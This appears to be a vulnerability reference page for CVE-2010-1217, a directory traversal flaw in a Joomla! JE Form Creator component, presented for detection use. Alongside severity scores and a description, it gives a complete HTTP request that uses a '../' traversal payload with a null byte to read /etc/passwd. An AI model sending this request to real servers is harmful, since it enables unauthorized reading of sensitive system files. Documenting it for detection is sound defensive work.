🔙 목록으로 돌아가기

CVE-2010-1217: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion

TitleJoomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
RemediationApply all relevant security patches and product upgrades.
CVSS Score4.3
EPSS Score0.07857
CVE IDCVE-2010-1217
CWE IDCWE-22
Tags cve cve2010 edb packetstorm joomla lfi plugin je_form_creator vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE – the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.

🌐 HTTP Request

GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1217.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-1217.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A